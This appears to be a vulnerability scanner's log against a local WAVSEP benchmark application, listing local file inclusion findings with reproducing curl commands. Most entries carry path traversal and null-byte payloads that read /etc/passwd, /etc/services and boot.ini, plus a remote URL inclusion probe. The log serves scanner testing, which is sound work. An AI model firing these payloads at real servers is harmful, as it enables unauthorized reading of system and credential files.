curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
